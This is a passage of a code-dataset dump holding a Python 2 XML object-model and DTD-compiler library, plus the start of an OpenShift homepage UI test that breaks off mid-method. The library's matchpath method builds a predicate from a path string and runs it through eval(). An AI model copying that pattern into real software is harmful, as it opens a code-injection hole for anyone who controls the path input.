[\"<%s%s%s>\" % (self._get_ns(), self._name, self._attr_str())]\n\t\tmap(s.append, map(str, self._children))\n\t\ts.append(\"</%s%s>\" % (self._get_ns(), self._name))\n\t\treturn \"\".join(s)\n\n\tdef _empty_str(self):\n\t\treturn \"<%s%s%s />\" % (self._get_ns(), self._name, self._attr_str())\n\t\n\tdef _attr_str(self):\n\t\tattrs = map(lambda t: ' %s=\"%s\"' % t, map(lambda t: (t[0], escape(str(t[1]))), filter(lambda t: t[1] is not None, self._attribs.items())))\n\t\treturn \"\".join(attrs)\n\n\tdef emit(self, fo):\n\t\tself._verify_attributes()\n\t\tif not self.CONTENTMODEL or self.CONTENTMODEL.is_empty():\n\t\t\tfo.write(self._empty_str())\n\t\telse:\n\t\t\tfo.write(\"<%s%s%s>\" % (self._get_ns(), self._name, self._attr_str()))\n\t\t\tmap(lambda o: o.emit(fo), self._children)\n\t\t\tfo.write(\"</%s%s>\" % (self._get_ns(), self._name))\n\n\t# methods for node path manipulation\n\tdef pathname(self):\n\t\t\"\"\"pathname() returns the ElementNode as a string in xpath format.\"\"\"\n\t\tif self._attribs:\n\t\t\ts = map(lambda i: \"@%s='%s'\" % (i[0],i[1]), self._attribs.items())\n\t\t\treturn \"%s[%s]\" % (self.__class__.__name__, \" and \".join(s))\n\t\telse:\n\t\t\treturn self.__class__.__name__\n\n\tdef fullpath(self):\n\t\t\"\"\"fullpath() returns the ElementNode's full path as a string in xpath format.\"\"\"\n\t\tif self._parent:\n\t\t\tbase = self._parent.fullpath()\n\t\telse:\n\t\t\tbase = \"\"\n\t\treturn \"%s/%s\" % (base, self.pathname() )\n\n\tdef matchpath(self, pathelement):\n\t\tif \"[\" not in pathelement:\n\t\t\treturn pathelement == self._name\n\t\telse:\n\t\t\txpath_re = re.compile(r'(\\w*)(\\[.*])')\n\t\t\tmo = xpath_re.match(pathelement)\n\t\t\tif mo:\n\t\t\t\tname, match = mo.groups()\n\t\t\t\tmatch = match.replace(\"@\", \"self.\")\n\t\t\t\tmatch = match.replace(\"=\", \"==\")\n\t\t\t\treturn (name == self._name and eval(match[1:-1]))\n\t\t\telse:\n\t\t\t\traise ValueError, \"Invalid path element\"\n\n\tdef find_elements(self, pathelement):\n\t\trv = []\n\t\tfor child in self._children:\n\t\t\tif child.matchpath(pathelement):\n\t\t\t\trv.append(child)\n\t\treturn rv\n\t\n\tdef get_element(self, pathelement):\n\t\tfor child in self._children:\n\t\t\tif child.matchpath(pathelement):\n\t\t\t\treturn child\n\t\treturn None\n\n\tdef elements(self, elclass):\n\t\t\"\"\"Return iterator that iterates over list of elements matching elclass\"\"\"\n\t\treturn NodeIterator(self, elclass)\n\n\tdef _find_node(self, eltype, collect=None):\n\t\tif collect is None:\n\t\t\tcollection = []\n\t\telse:\n\t\t\tcollection = collect # should be a list\n\t\tfor el in self._children:\n\t\t\tif el.has_children():\n\t\t\t\tel._find_node(eltype, collection)\n\t\t\tif isinstance(el, eltype):\n\t\t\t\tcollection.append(el)\n\t\treturn collection\n\n\tdef find(self, elclass, **attribs):\n\t\tfor obj in self._children:\n\t\t\tif isinstance(obj, elclass):\n\t\t\t\tif self._attribs_match(obj, attribs):\n\t\t\t\t\treturn obj\n\t\treturn None\n\n\tdef getall(self, elclass, depth=0, collect=None):\n\t\tif collect is None:\n\t\t\trv = []\n\t\telse:\n\t\t\trv = collect # should be a list\n\t\tfor el in self._children:\n\t\t\tif isinstance(el, elclass):\n\t\t\t\trv.append(el)\n\t\t\tif depth > 0:\n\t\t\t\tel.getall(elclass, depth-1, rv)\n\t\treturn rv\n\n\tdef _attribs_match(self, obj, attribdict):\n\t\tfor tname, tval in attribdict.items():\n\t\t\ttry:\n\t\t\t\tif getattr(obj, tname) != tval:\n\t\t\t\t\treturn 0\n\t\t\texcept AttributeError:\n\t\t\t\treturn 0\n\t\treturn 1\n\n\t# XPath-like functions\n\tdef comment(self):\n\t\treturn self._find_node(Comment)\n\n\tdef text(self):\n\t\treturn self._find_node(Text)\n\n\tdef processing_instruction(self):\n\t\treturn self._find_node(ProcessingInstruction)\n\t\n\tdef node(self):\n\t\treturn self._find_node(ElementNode)\n\n\nclass NodeIterator(object):\n\tdef __init__(self, node, elclass):\n\t\tself.node = node\n\t\tself.elclass = elclass\n\t\tself.i = 0\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef next(self):\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tn = self.node[self.i]\n\t\t\texcept IndexError:\n\t\t\t\traise StopIteration\n\t\t\tself.i += 1\n\t\t\tif isinstance(n, elclass):\n\t\t\t\tbreak\n\t\treturn n\n\n\ndef find_nodes(node, elclass):\n\tif isinstance(node, elclass):\n\t\tyield node\n\tfor child in node.get_children():\n\t\tfor cn in find_nodes(child, elclass):\n\t\t\tyield cn\n\treturn\n\n\nclass Fragments(ElementNode):\n\t\"\"\"Fragments is a special holder class to hold 'loose' markup fragments.\n\tThat is, bits of markup that don't have a common container (e.g. not in\n\troot element). It is invisible.\"\"\"\n\tdef __str__(self):\n\t\ts = []\n\t\tmap(s.append, map(str, self._children))\n\t\treturn \"\".join(s)\n\n\tdef emit(self, fo):\n\t\tmap(lambda o: o.emit(fo), self._children)\n\n\nclass POMString(unicode):\n\tdef __new__(cls, arg, enc=None):\n\t\tif type(arg) is unicode:\n\t\t\treturn unicode.__new__(cls, arg)\n\t\tif not enc:\n\t\t\tenc = sys.getdefaultencoding()\n\t\treturn unicode.__new__(cls, arg, enc)\n\n\nclass POMTimeStamp(long):\n\tpass\n\n\nclass BeautifulWriter(object):\n\t\"\"\"A wrapper for a file-like object that is itself a file-like object. It\n\tis basically a shim. It attempts to beautify the XML stream emitted by the\n\tPOM tree. Pass one of these to the emit method if you want better looking\n\toutput.\"\"\"\n\tdef __init__(self, fo, inline=[]):\n\t\tself._fo = fo # the wrapped file object\n\t\tself._inline = list(inline) # list of special tags that are inline\n\t\tself._level = 0\n\t\tself._tagre = re.compile(r\"<([-a-zA-Z0-9_:]+)\") # start tag\n\tdef __getattr__(self, name):\n\t\treturn getattr(self._fo, name)\n\n\tdef write(self, data):\n\t\tif data.endswith(\"/>\"):\n\t\t\tself._fo.write(\"\\n\"+\" \"*self._level)\n\t\t\treturn self._fo.write(data)\n\t\tif data.startswith(\"</\"):\n\t\t\tself._level -= 1\n\t\t\tself._fo.write(\"\\n\"+\" \"*self._level)\n\t\t\treturn self._fo.write(data)\n\t\tmo = self._tagre.search(data)\n\t\tif mo:\n\t\t\tif str(mo.group(1)) in self._inline:\n\t\t\t\treturn self._fo.write(data)\n\t\t\telse:\n\t\t\t\tself._fo.write(\"\\n\"+\" \"*self._level)\n\t\t\t\tself._level += 1\n\t\t\t\treturn self._fo.write(data)\n\t\treturn self._fo.write(data)\n\n\n# base class for whole POM documents, including Header.\nclass POMDocument(object):\n\tDOCTYPE = \"\\n\"\n\tXMLHEADER = '<?xml version=\"1.0\" encoding=\"%s\"?>\\n' %(DEFAULT_ENCODING,) # default\n\tdef __init__(self, dtd=None, encoding=None):\n\t\tself.dtds = []\n\t\tself._getters = []\n\t\tself.root = None\n\t\tself.parser = None\n\t\tself.dirty = 0\n\t\tif encoding:\n\t\t\tself.set_encoding(encoding)\n\t\tif dtd:\n\t\t\tself.add_dtd(dtd)\n\n\tdef __str__(self):\n\t\treturn self.XMLHEADER + self.DOCTYPE + str(self.root) + \"\\n\"\n\n\tdef emit(self, fo):\n\t\tfo.write(self.XMLHEADER)\n\t\tfo.write(self.DOCTYPE)\n\t\tfo.write(\"\\n\")\n\t\tself.root.emit(fo)\n\t\tfo.write(\"\\n\")\n\n\tdef set_dirty(self, val=1):\n\t\tself.dirty = val\n\n\tdef set_root(self, root):\n\t\t\"\"\"Forcibly set the root document. Be careful with this.\"\"\"\n\t\tif isinstance(root, ElementNode):\n\t\t\tself.root = root\n\t\telse:\n\t\t\traise ValueError, \"root document must be POM ElementNode.\"\n\n\tdef add_dtd(self, dtdmod):\n\t\tself.dtds.append(dtdmod)\n\t\tself._getters.append(get_getter(dtdmod))\n\n\tdef get_elementnode(self, name):\n\t\tfor getter in self._getters:\n\t\t\ttry:\n\t\t\t\treturn getter(name)\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\t\n\tdef set_encoding(self, encoding):\n\t\t# verify encoding is valid\n\t\timport codecs\n\t\ttry:\n\t\t\tcodecs.lookup(encoding)\n\t\texcept codecs.LookupError, err:\n\t\t\traise ValueError, err.args[0]\n\t\tself.XMLHEADER = '<?xml version=\"1.0\" encoding=\"%s\"?>\\n' %(encoding,)\n\t\tself.encoding = encoding\n\t\n\tdef set_doctype(self, doctype):\n\t\tself.DOCTYPE = str(doctype)\n\n\tdef get_parser(self, handlerclass=None):\n\t\tself.parser = get_parser(self.dtds, handlerclass or ObjectParserHandler, self._callback)\n\t\treturn self.parser\n\t\n\tdef del_parser(self):\n\t\tself.parser = None\n\n\tdef _callback(self, doc):\n\t\tself.root = doc\n\t\tself.dirty = 0\n\t\n\tdef parse(self, url, handlerclass=None):\n\t\tif not self.parser:\n\t\t\tself.get_parser(handlerclass or ObjectParserHandler)\n\t\tself.parser.parse(url)\n\t\tself.del_parser()\n\n\tdef parseFile(self, fo, handlerclass=None):\n\t\tif not self.parser:\n\t\t\tself.get_parser(handlerclass or ObjectParserHandler)\n\t\tself.parser.parseFile(fo)\n\t\tself.del_parser()\n\n\tdef parseString(self, string, handlerclass=None):\n\t\tif not self.parser:\n\t\t\tself.get_parser(handlerclass or ObjectParserHandler)\n\t\tself.parser.parseFile(StringIO(string))\n\n\tdef write_xmlfile(self, filename=None):\n\t\tfilename = filename or self.filename\n\t\tif filename:\n\t\t\tfo = open(os.path.expanduser(filename), \"w\")\n\t\t\ttry:\n\t\t\t\tself.emit(fo)\n\t\t\tfinally:\n\t\t\t\tfo.close()\n\t\tself.dirty = 0\n\twritefile = write_xmlfile\n\n\tdef writefileobject(self, fo):\n\t\tself.emit(fo)\n\n\tdef get_document(self, filename):\n\t\tself.get_parser()\n\t\tself.parse(filename)\n\t\tself.filename = filename\n\t\n\tdef getnode(self, path):\n\t\t\"\"\"getnode(path) Returns an ElementNode addressed by the path.\"\"\"\n\t\telements = path.split(\"/\")\n\t\twhile not elements[0]: # eat empty first element\n\t\t\telements.pop(0)\n\t\tnode = self.root\n\t\tpathelement = elements.pop(0)\n\t\tif node.matchpath(pathelement):\n\t\t\twhile elements:\n\t\t\t\tpathelement = elements.pop(0)\n\t\t\t\tnode = node.get_element(pathelement)\n\t\t\t\tif node is None:\n\t\t\t\t\traise IndexError, \"path element not found\"\n\t\t\treturn node\n\t\telse:\n\t\t\traise IndexError, \"first path element not found\"\n\n\tdef setnode(self, path, text):\n\t\tnode = self.getnode(path)\n\t\tnode.replace_text(text)\n\t\n\tdef delnode(self, path):\n\t\tels = path.split(\"/\")\n\t\tpath, endnode = \"/\".join(els[:-1]), els[-1]\n\t\tnode = self.getnode(path)\n\t\tdel node[endnode]\n\t\n\tdef addnode(self, basepath, newnode):\n\t\tnode = self.getnode(basepath)\n\t\tnode.append(newnode)\n\n\tdef add_text(self, basepath, text, encoding=None):\n\t\tnode = self.getnode(basepath)\n\t\tnode.add_text(text, encoding or self.encoding)\n\n\tdef _write_text(self, fo, node):\n\t\tfor n in node:\n\t\t\tif isinstance(n, Text):\n\t\t\t\tfo.write(n.fullpath())\n\t\t\t\tfo.write(\"\\n\")\n\t\t\telse:\n\t\t\t\tself._write_text(fo, n)\n\t\t\n\tdef write_paths(self, fileobject):\n\t\trealfile = 0\n\t\tif type(fileobject) is str:\n\t\t\tfileobject = open(fileobject, \"w\")\n\t\t\trealfile = 1\n\t\tself._write_text(fileobject, self.root)\n\t\tif realfile:\n\t\t\tfileobject.close()\n\n# parses XML files into a POM object model. A callback function is then called \n# with this object model as a paramter.\nclass ObjectParserHandler(object):\n\tdef __init__(self, callback, module=None):\n\t\tself.stack = []\n\t\tself.msg = None\n\t\tself.callback = callback # gets called when message fully parsed. The\n\t\t # argument is the toplevel message object.\n\t\tself.modules = []\n\t\tif module is not None:\n\t\t\tif type(module) is list:\n\t\t\t\tself.modules.extend(module)\n\t\t\telse:\n\t\t\t\tself.modules.append(module)\n\n\tdef add_module(self, module):\n\t\tself.modules.append(module)\n\n\tdef _get_class(self, name):\n\t\tklass = None\n\t\tfor mod in self.modules:\n\t\t\ttry:\n\t\t\t\tklass = getattr(mod, identifier(name)) # name dtd compiler translated to\n\t\t\texcept AttributeError:\n\t\t\t\tcontinue\n\t\t\tif klass:\n\t\t\t\treturn klass\n\t\traise AttributeError\n\n\tdef startDocument(self):\n\t\tself.stack = []\n\n\tdef endDocument(self):\n\t\tif self.stack: # stack should be empty now\n\t\t\traise ValidationError, \"unbalanced document!\"\n\t\tself.callback(self.msg)\n\t\tself.msg = None\n\n\tdef startElement(self, name, atts):\n\t\t\"Handle an event for the beginning of an element.\"\n\t\ttry:\n\t\t\tklass = self._get_class(name)\n\t\texcept AttributeError:\n\t\t\traise ValidationError, \"Undefined element tag: \"+name\n\t\tattr = {} # atts is a instance with unicode keys.. must convert to str..\n\t\tdef fixatts(t):\n\t\t\tattr[str(t[0])] = unescape(str(t[1]))\n\t\tmap(fixatts, atts.items())\n\t\tobj = apply (klass, (), attr)\n\t\tself.stack.append(obj)\n\n\tdef endElement(self, name):\n\t\t\"Handle an event for the end of an element.\"\n\t\tobj = self.stack.pop()\n\t\tif self.stack:\n\t\t\tself.stack[-1].append(obj)\n\t\telse:\n\t\t\tself.msg = obj\n\n\tdef characters(self, ch, start, length):\n\t\tif self.stack:\n\t\t\ttext = ch[start:start+length]\n\t\t\ttext = text.strip()\n\t\t\tif text:\n\t\t\t\tself.stack[-1].append(Text(text))\n\t\t\n\tdef ignorableWhitespace(self, ch, start, length):\n\t\tpass\n\tdef processingInstruction(self, target, data):\n\t\t\"Handle a processing instruction event.\"\n\t\tprint \"unhandled processing instruction:\", target, data\n\tdef setDocumentLocator(self, locator):\n\t\t\"Receive an object for locating the origin of SAX document events.\"\n\t\tpass\n\n\ndef _default_parser_callback(obj):\n\tobj.emit(sys.stdout)\n\ndef get_parser(dtdmodules, handlerclass=ObjectParserHandler, callback=_default_parser_callback):\n\tfrom xml.sax import saxexts\n\thandler = handlerclass(callback, dtdmodules)\n\tparser = saxexts.make_parser()\n\tparser.setDocumentHandler(handler)\n\treturn parser\n\ndef parseString(string, dtdmodules, handlerclass=ObjectParserHandler, callback=_default_parser_callback):\n\tparser = get_parser(dtdmodules, handlerclass, callback)\n\tparser.parseFile(StringIO(string))\n\ndef get_dtd_compiler(fo, mixinmodule=None):\n\tglobal sourcegen\n\timport sourcegen\n\tfrom xml.parsers.xmlproc.dtdparser import DTDParser\n\tgenerator = sourcegen.get_sourcefile(fo)\n\tdh = DTDConsumerForSourceGeneration(generator, mixinmodule)\n\tparser = DTDParser()\n\tparser.set_dtd_consumer(dh)\n\treturn parser\n\n\n# xml helper classes, used in both generation and operation\n# The are instantiated during compilation to generate themselves. \n# Then, when imported by the user from the dtds package, are used normally.\nclass ContentModel(object):\n\t\"\"\"Represents and validates a content model. \"\"\"\n\tdef __init__(self, rawmodel=None):\n\t\tself.model = rawmodel # XXX\n\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%r)\" % (cl.__module__, cl.__name__, self.model)\n\n\tdef is_empty(self):\n\t\treturn not self.model\n\n\nclass _ContentModelGenerator(object):\n\t\"\"\"_ContentModelGenerator(rawmodel)\n\tThe DTD parser generated and final content model are so different that a\n\tdifferent content model generator is used for this object.\n\n\t\"\"\"\n\tdef __init__(self, rawmodel=None):\n\t\ttm_type = type(rawmodel)\n\t\tif tm_type is str:\n\t\t\tif rawmodel == \"EMPTY\":\n\t\t\t\tself.model = EMPTY\n\t\t\telif rawmodel == \"#PCDATA\":\n\t\t\t\tself.model = PCDATA\n\t\t\telif rawmodel == \"ANY\":\n\t\t\t\tself.model = ANY\n\t\t\telse:\n\t\t\t\traise ValidationError, \"ContentModelGenerator: unknown special type\"\n\t\telif tm_type is tuple:\n\t\t\tself.model = (ANY,) # rawmodel # XXX\n\t\telif tm_type is type(None):\n\t\t\tself.model = None\n\t\telse:\n\t\t\traise RuntimeError, \"unknown content model format\"\n\n\tdef __repr__(self):\n\t\treturn \"%s.%s(%r)\" % (ContentModel.__module__, ContentModel.__name__, self.model)\n\n\nclass Enumeration(list):\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%s)\" % (cl.__module__, cl.__name__, list.__repr__(self))\n\tdef __str__(self):\n\t\treturn \"(%s)\" % \", \".join(map(repr, self))\n\nclass AttributeList(list):\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%s)\" % (cl.__module__, cl.__name__, list.__repr__(self))\n\tdef __str__(self):\n\t\treturn \" \".join(map(str, self))\n\nclass _AttributeType(str):\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%s)\" % (cl.__module__, cl.__name__, self)\n\nclass IDREFS(AttributeList):\n\tdef add_ref(self, value):\n\t\tself.data.append(IDREF(value))\n\nclass ENTITIES(AttributeList):\n\tpass\nclass NMTOKENS(AttributeList):\n\tpass\n\nclass CDATA(_AttributeType):\n\tpass\nclass ID(_AttributeType):\n\tpass\nclass IDREF(_AttributeType):\n\tpass\nclass NMTOKEN(_AttributeType):\n\tpass\nclass ENTITY(_AttributeType):\n\tpass\n\n\nPCDATA = Text\nANY = True\nEMPTY = None\n\n# enumerations\nAT_CDATA = 1\nAT_ID = 2\nAT_IDREF = 3\nAT_IDREFS = 4\nAT_ENTITY = 5\nAT_ENTITIES = 6\nAT_NMTOKEN = 7\nAT_NMTOKENS = 8\n\nREQUIRED = 11 # attribute is mandatory\nIMPLIED = 12 # inherited from environment if not specified\nDEFAULT = 13 # default value for enumerated types (added by parser)\nFIXED = 14 # always the same, fixed, value.\n\n_ATTRTYPEMAP = {\n\t\"CDATA\": AT_CDATA,\n\t\"ID\": AT_ID,\n\t\"IDREF\": AT_IDREF,\n\t\"IDREFS\": AT_IDREFS,\n\t\"ENTITY\": AT_ENTITY,\n\t\"ENTITIES\": AT_ENTITIES,\n\t\"NMTOKEN\": AT_NMTOKEN,\n\t\"NMTOKENS\": AT_NMTOKENS\n}\n\n_ATTRCLASSMAP = {\n\tAT_CDATA: CDATA,\n\tAT_ID: ID,\n\tAT_IDREF: IDREF,\n\tAT_IDREFS: IDREFS,\n\tAT_ENTITY: ENTITY,\n\tAT_ENTITIES: ENTITIES,\n\tAT_NMTOKEN: NMTOKEN,\n\tAT_NMTOKENS: NMTOKENS\n}\n\n_DEFAULTMAP = {\n\tu'#REQUIRED': REQUIRED,\n\tu'#IMPLIED': IMPLIED,\n\tu'#DEFAULT': DEFAULT,\n\tu'#FIXED': FIXED,\n}\n\nclass XMLAttribute(object):\n\tdef __init__(self, name, a_type, a_decl, a_def=None):\n\t\tself.name = str(name)\n\t\ta_type_type = type(a_type)\n\t\t#a_decl_type = type(a_decl)\n\t\tif a_type_type is unicode: # from the parser\n\t\t\tself.a_type = _ATTRTYPEMAP.get(str(a_type), a_type)\n#\t\telif a_type_type is tuple or a_type_type is list:\n#\t\t\tself.a_type = a_type # XXX\n\t\telif a_type_type is int: # from the generated file\n\t\t\tself.a_type = _ATTRCLASSMAP.get(a_type, a_type)\n\t\telif a_type_type is list:\n\t\t\tself.a_type = Enumeration(map(str, a_type))\n\t\telse:\n\t\t\tself.a_type = a_type\n\t\t# declaration\n\t\t# convert string to int value when generating, just use the int when imported from Python dtd format.\n\t\tself.a_decl = _DEFAULTMAP.get(a_decl, a_decl)\n\t\tself.default = a_def\n\t\t# save the type to speed verify\n\t\tself.a_type_type = type(self.a_type)\n\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%r, %r, %r, %r)\" % (cl.__module__, cl.__name__, self.name, self.a_type, self.a_decl, self.default)\n\n\tdef verify(self, value):\n\t\tif issubclass(type(self.a_type), list):\n\t\t\tif value not in self.a_type:\n\t\t\t\traise ValidationError, \"Enumeration has wrong value. %s is not one of %r.\" % (value, self.a_type)\n\t\telif self.a_decl == FIXED:\n\t\t\tif value != self.default:\n\t\t\t\traise ValidationError, \"Bad value for FIXED attributed. %r must be %r.\" % (value, self.default)\n\t\treturn True\n\n\n# this DTD parser consumer generates the Python source code from the DTD. \nclass DTDConsumerForSourceGeneration(object):\n\tdef __init__(self, generator, mixins=None):\n\t\tself.generator = generator\n\t\tself.elements = {}\n\t\tself.parameter_entities = {}\n\t\tself.general_entities = {}\n\t\tself.mixins = mixins # should be a module object\n\n\tdef dtd_start(self):\n\t\tprint \"Starting to parse DTD...\",\n\t\tself.generator.add_comment(\"This file generated by a program. do not edit.\")\n\t\tself.generator.add_import(sys.modules[__name__])\n\t\tif self.mixins:\n\t\t\tself.generator.add_import(self.mixins)\n\n\tdef dtd_end(self):\n\t\tprint \"done parsing. Writing file.\"\n\t\tself.generator.write()\n\n\tdef new_element_type(self, elem_name, elem_cont):\n\t\t\"Receives the declaration of an element type.\"\n\t\ttry:\n\t\t\telement = self.elements[elem_name]\n\t\texcept KeyError:\n\t\t\tparents = [ElementNode]\n\t\t\tmixinname = \"%sMixin\" % ( elem_name )\n\t\t\tif self.mixins and hasattr(self.mixins, mixinname):\n\t\t\t\tparents.insert(0, getattr(self.mixins, mixinname))\n\t\t\t# class name is capitalized to avoid clashes with Python key words.\n\t\t\tch = self.generator.add_class(identifier(elem_name), tuple(parents))\n\t\t\tch.add_attribute(\"_name\", elem_name)\n\t\t\tch.add_attribute(\"CONTENTMODEL\", _ContentModelGenerator(elem_cont))\n\t\t\tself.elements[elem_name] = ch\n\t\t\t\n\tdef new_attribute(self, elem, attr, a_type, a_decl, a_def):\n\t\t\"Receives the declaration of a new attribute.\"\n\t\ttry:\n\t\t\telement = self.elements[elem]\n\t\texcept KeyError:\n\t\t\traise ValidationError, \"attribute defined before element!\"\n\t\ttry:\n\t\t\tattlist = element.get_attribute(\"ATTLIST\")\n\t\texcept KeyError:\n\t\t\telement.add_attribute(\"ATTLIST\", AttributeList())\n\t\t\tattlist = element.get_attribute(\"ATTLIST\")\n\t\tattlist.append(XMLAttribute(attr, a_type, a_decl, a_def))\n\n\tdef handle_comment(self, contents):\n\t\t\"Receives the contents of a comment.\"\n\t\tself.generator.add_comment(contents)\n\n\tdef new_parameter_entity(self,name,val):\n\t\t\"Receives internal parameter entity declarations.\"\n\t\t# these are handled internally by the DTD parser. but.. save it anyway.\n\t\tself.parameter_entities[name] = val\n\t\n\tdef new_external_pe(self, name, pubid, sysid):\n\t\t\"Receives external parameter entity declarations.\"\n\t\t# these are handled internally by the DTD parser.\n\t\n\tdef new_general_entity(self,name,val):\n\t\t\"Receives internal general entity declarations.\"\n\t\tself.general_entities[name] = val\n\t\t# XXX do we need to handle this?\n\t\t#print \"XXX general entity:\"\n\t\t#print name, val\n\n\tdef new_external_entity(self, ent_name, pub_id, sys_id, ndata):\n\t\t\"\"\"Receives external general entity declarations. 'ndata' is the\n\t\tempty string if the entity is parsed.\"\"\"\n\t\t# XXX do we need to handle this?\n\t\tprint \"XXX external entity:\"\n\t\tprint ent_name, pub_id, sys_id, ndata\n\n\tdef new_notation(self,name,pubid,sysid):\n\t\t\"Receives notation declarations.\"\n\t\t# XXX do we need to handle this?\n\t\tprint \"XXX unhandled notation:\",\n\t\tprint name, pubid, sysid\n\n\tdef handle_pi(self, target, data):\n\t\t\"Receives the target and data of processing instructions.\"\n\t\t# XXX do we need to handle this?\n\t\tprint \"XXX unhandled PI:\",\n\t\tprint target, data\n\n#########################################################\n# Utility functions\n#########################################################\n\ndef get_mod_file(sourcefilename):\n\t\"\"\"get_mod_file(sourcefilename)\n\tConverts a file name into a file name inside the dtds package. This file\n\tname is the destination for generated python files.\n\t\"\"\"\n\timport dtds\n\tmodname = os.path.splitext(os.path.split(sourcefilename)[1])[0]\n\treturn os.path.join(dtds.__path__[0], modname.translate(maketrans(\"-. \", \"___\"))+\".py\")\n\n\ndef _find_element(elname, modules):\n\tfor mod in modules:\n\t\ttry:\n\t\t\treturn getattr(mod, elname)\n\t\texcept AttributeError:\n\t\t\tcontinue\n\treturn None\n\ndef _construct_node(name, modules):\n\tif \"[\" not in name:\n\t\tnc = _find_element(name, modules)\n\t\tif nc is None:\n\t\t\traise ValidationError, \"no such element name in modules\"\n\t\treturn nc() # node\n\telse:\n\t\txpath_re = re.compile(r'(\\w*)(\\[.*])')\n\t\tmo = xpath_re.match(name)\n\t\tif mo:\n\t\t\tattdict = {}\n\t\t\tename, attribs = mo.groups()\n\t\t\tnc = _find_element(ename, modules)\n\t\t\tif nc is None:\n\t\t\t\traise ValidationError, \"no such element name in modules\"\n\t\t\tattribs = attribs[1:-1].split(\"and\") # chop brackets and split on 'and'\n\t\t\tattribs = map(\"\".strip, attribs) # strip whitespace\n\t\t\tfor att in attribs: # dict elememnts are name and vaue\n\t\t\t\tname, val = att.split(\"=\")\n\t\t\t\tattdict[name[1:]] = val[1:-1]\n\t\treturn apply(nc, (), attdict)\n\n\ndef make_node(path, modules, value=None):\n\t\"\"\"make_Node(path, modules, [value])\n\tMakes a node or an XML fragment given a path, element module list, and an\n\toptional value.\n\t\"\"\"\n\tif type(modules) is not list:\n\t\tmodules = [modules]\n\tpathelements = path.split(\"/\")\n\tif not pathelements[0]: # delete possible empty root node\n\t\tdel pathelements[0]\n\trootnode = current = _construct_node(pathelements[0], modules)\n\tfor element in pathelements[1:]:\n\t\tnew = _construct_node(element, modules)\n\t\tcurrent.append(new)\n\t\tcurrent = new\n\tcurrent.set_inline()\n\tif value is not None:\n\t\tcurrent.add_text(value)\n\treturn rootnode\n\t\ndef unescape(s):\n\tif '&' not in s:\n\t\treturn s\n\ts = s.replace(\"&lt;\", \"<\")\n\ts = s.replace(\"&gt;\", \">\")\n#\ts = s.replace(\"&apos;\", \"'\")\n\ts = s.replace(\"&quot;\", '\"')\n\ts = s.replace(\"&amp;\", \"&\") # Must be last\n\treturn s\n\ndef escape(s):\n\ts = s.replace(\"&\", \"&amp;\") # Must be first\n\ts = s.replace(\"<\", \"&lt;\")\n\ts = s.replace(\">\", \"&gt;\")\n#\ts = s.replace(\"'\", \"&apos;\")\n\ts = s.replace('\"', \"&quot;\")\n\treturn s\n\n# self test\nif __name__ == \"__main__\":\n\tpass\n\t# note: running this script as __main__ will not generate valid source code. \n\t# Use the dtd2py script for that.\n\t#dtdp = get_dtd_compiler(sys.stdout)\n\t#dtdp.parse_resource(FILE)\n#\toutfile.close()\n#\tprint Comment(\"some ------- comment-\")\n#\tprint repr(POMString(u'This is a test.'))\n#\tprint repr(POMString(u'This is a test.', 'utf-8'))\n#\tprint repr(POMString('This is a test.', 'utf-8'))\n#\timport dtds.xhtml1_strict\n#\tdoc = POMDocument(dtds.xhtml1_strict)\n#\tdoc.set_root(doc.get_elementnode(\"html\")())\n#\tprint doc\n\n" }, { "alpha_fraction": 0.5683290362358093, "alphanum_fraction": 0.5829015374183655, "avg_line_length": 31.840425491333008, "blob_id": "a8834e4d012a0aad657c27f7ec098e9391e93b41", "content_id": "3a8b08b025b833c449855ca3a05f39d953db5290", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3088, "license_type": "no_license", "max_line_length": 101, "num_lines": 94, "path": "/automation/open/testmodules/UI/web/CheckHomeContent.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n#\n# File name: CheckHomeContent.py\n# Date: 2012/06/29 10:56\n# Author: [email protected] \n#\n\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Demo01(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n #web.go_to_signin()\n #web.login()\n web.assert_text_equal_by_xpath('LEARN MORE',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n web.assert_text_equal_by_xpath('GET STARTED',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n web.assert_text_equal_by_xpath('DEVELOPERS',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n web.assert_text_equal_by_xpath('COMMUNITY',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[5]/a/span''')\n\n #check weather the links are correct\n #LEARN MORE\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n web.assert_text_equal_by_xpath('What is OpenShift?',\n '''/html/body/div[@id='content']/div/div/div/div/div/h1''',\n '`LEARN MORE` page is missing')\n\n #GET STARTED\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n web.assert_text_equal_by_xpath('Get Started with OpenShift',\n '''/html/body/div[@id='content']/div/div/div/div/div/h1''',\n 'Get Started page is missing')\n\n #LOGO\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/div/a/div[1]''')\n web.assert_text_equal_by_xpath('BUZZ',\n '''/html/body/div[@id='buzz']/div/div/div/div/h2/strong''',\n 'Check the Buzz part is missing')\n\n #DEVELOPERS\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n web.assert_text_equal_by_xpath('Developer Center',\n '''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div[1]''',\n 'Developers page is missing')\n\n #COMMUNITY\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[5]/a/span''')\n 